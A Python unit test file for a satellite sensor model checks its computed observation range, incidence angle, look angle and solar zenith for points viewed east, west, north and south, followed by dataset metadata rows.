TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# 90 deg orbit inclination
poi_lon_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_2_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the East.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the calculations below. They do, however, influence the coverage calculations (which are not covered by this test).
The velocity vector may influence the sign of the look angle.
Tested against a reference model that works for larger angles in the special case range = RE.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test 0 deg inclination
poi_lon_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lon_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*poi_lon_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], poi_lon_deg, delta = 0.15)
# test positive look angle, 90 deg orbit inclination
poi_lon_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lon_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -1*orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*poi_lon_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], poi_lon_deg, delta = 0.15)
# test negative look angle, 90 deg orbit inclination
poi_lon_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lon_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*poi_lon_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*poi_lon_deg, delta = 0.15)
def test_calc_data_metrics_3_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the West.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the calculations below. They do, however, influence the coverage calculations (which are not covered by this test).
The velocity vector may influence the sign of the look angle.
Tested against a reference model that is accurate for small angles.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test 0 deg inclination
poi_lon_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test positive look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test negative look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lon_deg)/ 500)) # approximate model, good for small nadir angles
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_3_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to the West.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the calculations below. They do, however, influence the coverage calculations (which are not covered by this test).
The velocity vector may influence the sign of the look angle.
Tested against an alternate reference model that works for larger angles in the special case range = RE.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test 0 deg inclination
poi_lon_deg = -1 * random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lon_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lon_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lon_deg), delta = 0.15)
# test positive look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lon_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lon_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lon_deg), delta = 0.15)
# test negative look angle, 90 deg orbit inclination
poi_lon_deg = -1 * random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lon_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': -1*orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': 0, 'lon [deg]': poi_lon_deg}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lon_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*abs(poi_lon_deg), delta = 0.15)
def test_calc_data_metrics_4_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to South.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with reference model which is good for small angles.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test 90 deg orbit inclination
poi_lat_deg = -1 * random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_4_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to South.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with alternate reference model which works for larger angles for a special case with range = RE.
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = -1*random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lat_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -1*orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = -1*random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lat_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*abs(poi_lat_deg), delta = 0.15)
# test 90 deg orbit inclination
poi_lat_deg = -1*random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lat_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
def test_calc_data_metrics_5_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to North.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with reference model which is good for small angles
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test 90 deg orbit inclination
poi_lat_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_5_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to North.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with alternate reference model which works for larger angles for a special case with range = RE
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lat_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0} # altitude = alt [km]
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lat_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -1*orbital_speed(alt*1e-3), 'vz [km/s]': 0} # altitude = alt km (varies with the drawn latitude)
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*abs(poi_lat_deg), delta = 0.15)
# test 90 deg orbit inclination
poi_lat_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lat_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)} # altitude = alt km (varies with the drawn latitude)
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
def test_get_id(self): #@TODO
pass
def test_get_field_of_view(self): #@TODO
pass
def test_get_scene_field_of_view(self): #@TODO
pass
def test_get_field_of_regard(self): #@TODO
pass
def test_get_orientation(self): #@TODO
pass
def test_get_pixel_config(self): #@TODO
o = BasicSensorModel.from_json('{}')
self.assertEqual(o.get_pixel_config().numberDetectorRows,4)
self.assertEqual(o.get_pixel_config().numberDetectorCols,4)
o = BasicSensorModel.from_json('{"numberDetectorRows":5, "numberDetectorCols":10}')
self.assertEqual(o.get_pixel_config().numberDetectorRows,5)
self.assertEqual(o.get_pixel_config().numberDetectorCols,10)
o = BasicSensorModel.from_json('{"numberDetectorCols":10}')
self.assertEqual(o.get_pixel_config().numberDetectorRows,4)
self.assertEqual(o.get_pixel_config().numberDetectorCols,10)
def test_synthesize_observation(self): #@TODO
pass
def test_get_pointing_option(self): #TODO
pass
| 75.087814
| 234
| 0.645481
| 5,635
| 41,899
| 4.664241
| 0.055368
| 0.047293
| 0.083704
| 0.107142
| 0.898109
| 0.88795
| 0.876955
| 0.870106
| 0.861431
| 0.84743
| 0
| 0.049916
| 0.222058
| 41,899
| 557
| 235
| 75.222621
| 0.756435
| 0.213585
| 0
| 0.724051
| 0
| 0.010127
| 0.18944
| 0.022624
| 0
| 0
| 0
| 0.001795
| 0.407595
| 1
| 0.048101
| false
| 0.017722
| 0.01519
| 0.002532
| 0.068354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e076407824c3f871dfe6754557da9e2eccb0f00c
| 75
|
py
|
Python
|
screens/objects/__init__.py
|
Blackth01/GamQuiz
|
cbf40dbd40a2dc5c04a9087c465dad90a59614db
|
[
"MIT"
] | 1
|
2019-07-08T00:57:57.000Z
|
2019-07-08T00:57:57.000Z
|
screens/objects/__init__.py
|
Blackth01/GamQuiz
|
cbf40dbd40a2dc5c04a9087c465dad90a59614db
|
[
"MIT"
] | null | null | null |
screens/objects/__init__.py
|
Blackth01/GamQuiz
|
cbf40dbd40a2dc5c04a9087c465dad90a59614db
|
[
"MIT"
] | null | null | null |
from screens.objects.dados import *
from screens.objects.pergunta import *
| 25
| 38
| 0.813333
| 10
| 75
| 6.1
| 0.6
| 0.360656
| 0.590164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 2
| 39
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ebc6ab9998db144234c2601c24861b2c48fa339
| 201
|
py
|
Python
|
networkx/algorithms/operators/__init__.py
|
jebogaert/networkx
|
8563c3313223a53c548530f39c8cfb6e433539d3
|
[
"BSD-3-Clause"
] | 10,024
|
2015-01-01T13:06:43.000Z
|
2022-03-31T12:45:25.000Z
|
networkx/algorithms/operators/__init__.py
|
jebogaert/networkx
|
8563c3313223a53c548530f39c8cfb6e433539d3
|
[
"BSD-3-Clause"
] | 3,191
|
2015-01-01T18:13:11.000Z
